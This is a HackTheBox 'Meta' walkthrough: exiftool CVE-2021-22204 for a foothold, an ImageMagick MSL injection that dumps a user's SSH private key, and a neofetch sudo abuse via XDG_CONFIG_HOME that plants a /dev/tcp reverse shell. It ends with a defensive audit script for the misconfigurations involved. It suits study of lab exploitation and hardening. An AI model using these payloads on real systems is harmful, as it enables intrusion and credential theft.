The real lack of freedom is the cage you build in your own heart.

HackTheBox Meta Walkthrough

0x01 Introduction

image

Target machine IP: 10.10.11.140.
Local machine IP: 10.10.16.6 (Mac M1).

0x02 Information Gathering

The port scan shows only ports 22 and 80 open.

image

Accessing port 80 on 10.10.11.140 redirects to http://artcorp.htb/, which does not resolve yet. Add the name to the hosts file and try again.

image

gobuster vhost -u artcorp.htb -w /Users/grayash/pentesting/web-basic/p12-字典收集/SecLists/Discovery/DNS/subdomains-top1million-110000.txt

image

image

The vhost scan turns up dev01.artcorp.htb, which hosts a metaview application with a file upload point.

image

Try uploading an image.

image

A little research shows that the output above is the metadata parsed by exiftool.

image

0x03 Exploitation

The upload is vulnerable to CVE-2021-22204, an arbitrary code execution bug in exiftool, so RCE is possible here.

Exploit:

Because the exploit needs exiftool installed and is awkward to reproduce on a Mac, the rest is done from Kali.

Kali's IP is 10.10.14.14.

Set the IP in the exploit to Kali's IP.

image

Run the exploit file to generate image.jpg.

image

Start listening on Kali.

nc -nlvp 9090

Access http://dev01.artcorp.htb/metaview/ and upload the generated image.jpg. A shell comes back to the listener.

image

Upgrade to an interactive terminal (reset asks for the terminal type; answer xterm).

python3 -c "import pty;pty.spawn('/bin/bash')"
script /dev/null -c bash
ctrl+z
stty raw -echo; fg
reset
xterm

0x04 Privilege Escalation

The shell runs as www-data, which has no permission to read user.txt.

image

find / -perm -4000 -type f 2>/dev/null

image

Use pspy64 to watch the processes running on the system. A shell script, convert_images.sh, runs periodically; let's see what it contains.

image

The content is as follows:

image

The mogrify command transforms images in place (resize to given dimensions, blur, crop, dither, etc.). Unlike convert, it overwrites the original image file instead of writing the result to a separate output file.

The shell injection technique is described in this article:

https://insert-script.blogspot.com/2020/11/imagemagick-shell-injection-via-pdf.html

<image authenticate='ff" `echo $(cat /home/thomas/.ssh/id_rsa)> /dev/shm/key`;"'>
  <read filename="pdf:/etc/passwd"/>
  <get width="base-width" height="base-height" />
  <resize geometry="400x400" />
  <write filename="test.png" />
  <svg width="700" height="700" xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink">
  <image xlink:href="msl:poc.svg" height="100" width="100"/>
  </svg>
</image>

image

Save the recovered key as ~/.ssh/id_rsa on Kali. Because echo $(cat ...) collapses the key's newlines into spaces, restore the line breaks so the file is in proper key format, and set its permissions to 400.

Then log in over SSH with the key to read user.txt.

ssh -i id_rsa thomas@10.10.11.140

Next, escalate to root privileges.

sudo -l shows that thomas may run the following command as root without a password:

image

(root) NOPASSWD: /usr/bin/neofetch \"\"

Running neofetch produces the following output:

image

According to GTFOBins (https://gtfobins.github.io/#neo), neofetch can be used for privilege escalation when it is allowed to run under sudo.

image

Looking at the sudo -l output again, the environment variable XDG_CONFIG_HOME is preserved for the sudo command. neofetch reads its configuration file from that directory, so we can place a reverse shell command in the configuration file; when neofetch runs as root, the shell connects back.

image

The specific steps are as follows:

  1. Prepare a reverse shell command:
     bash -c 'exec bash -i &>/dev/tcp/10.10.14.14/1234 <&1'
  2. Write it at the beginning of /home/thomas/.config/neofetch/config.conf.

image

  3. Export the environment variable:
     export XDG_CONFIG_HOME="$HOME/.config"
  4. Start listening with netcat:
     nc -nlvp 1234
  5. Execute neofetch:
     sudo -u root /usr/bin/neofetch \"\"

A root shell comes back to the listener, and root.txt can be read.
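Both escalation steps above depend on a configuration weakness: the ImageMagick MSL injection needs the MSL and PDF coders enabled in policy.xml, and the neofetch step needs sudo to keep XDG_CONFIG_HOME for a NOPASSWD command. The following audit script is an added example, not part of this writeup or of the box; the sudoers and policy.xml fragments it checks are constructed samples that mirror the settings described above.

```shell
#!/bin/sh
# Added audit helpers, not part of the writeup. They check the two misconfigurations
# the chain above relies on: a sudo rule that keeps XDG_CONFIG_HOME for a NOPASSWD
# command, and an ImageMagick policy.xml that still allows the MSL and PDF coders
# used by the shell-injection technique.

# Return 0 (risky) and print the offending lines if FILE both passes XDG_CONFIG_HOME
# through env_keep and grants a NOPASSWD rule; return 1 otherwise.
sudoers_keeps_xdg_for_nopasswd() {
    file=$1
    keep=$(grep -E '^[[:space:]]*Defaults.*env_keep.*XDG_CONFIG_HOME' "$file" || true)
    rule=$(grep -E 'NOPASSWD' "$file" || true)
    [ -n "$keep" ] && [ -n "$rule" ] || return 1
    printf 'env_keep passes XDG_CONFIG_HOME:\n%s\nNOPASSWD rules:\n%s\n' "$keep" "$rule"
}

# Return 0 if policy.xml does NOT disable coder CODER (e.g. MSL, PDF), 1 if it does.
# Assumes one coder per policy line, e.g. <policy domain="coder" rights="none" pattern="MSL" />.
im_coder_allowed() {
    file=$1; coder=$2
    ! grep -i 'domain="coder"' "$file" | grep -i 'rights="none"' | grep -Eiq "pattern=\"$coder\""
}

# Constructed sample files (not taken from the box) so the helpers can run offline.
tmp=$(mktemp -d)
# Weak sudoers fragment mirroring what sudo -l showed: env_keep makes neofetch read
# the invoking user's config directory while running as root.
cat > "$tmp/sudoers.weak" <<'EOF'
Defaults env_reset
Defaults env_keep += "XDG_CONFIG_HOME"
thomas ALL=(root) NOPASSWD: /usr/bin/neofetch ""
EOF
# Hardened fragment: env_reset without env_keep, so root's own config is used.
cat > "$tmp/sudoers.fixed" <<'EOF'
Defaults env_reset
thomas ALL=(root) NOPASSWD: /usr/bin/neofetch ""
EOF
cat > "$tmp/policy.weak" <<'EOF'
<policymap>
  <policy domain="resource" name="memory" value="256MiB"/>
</policymap>
EOF
cat > "$tmp/policy.fixed" <<'EOF'
<policymap>
  <policy domain="coder" rights="none" pattern="MSL" />
  <policy domain="coder" rights="none" pattern="PDF" />
</policymap>
EOF
sudoers_keeps_xdg_for_nopasswd "$tmp/sudoers.weak" && echo "sudoers: RISKY"
im_coder_allowed "$tmp/policy.weak" MSL && echo "policy.xml: MSL coder still enabled"
```

On a real host, point the helpers at /etc/sudoers (and /etc/sudoers.d/*) and at the policy.xml that convert -list policy reports.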

0x05 Conclusion

  1. I searched for a long time but could not find a practice target for CVE-2021-22204; some of the Docker environments are not set up yet. Fortunately, I learned how to exploit CVE-2021-22204.
  2. I learned how ImageMagick can be abused for privilege escalation.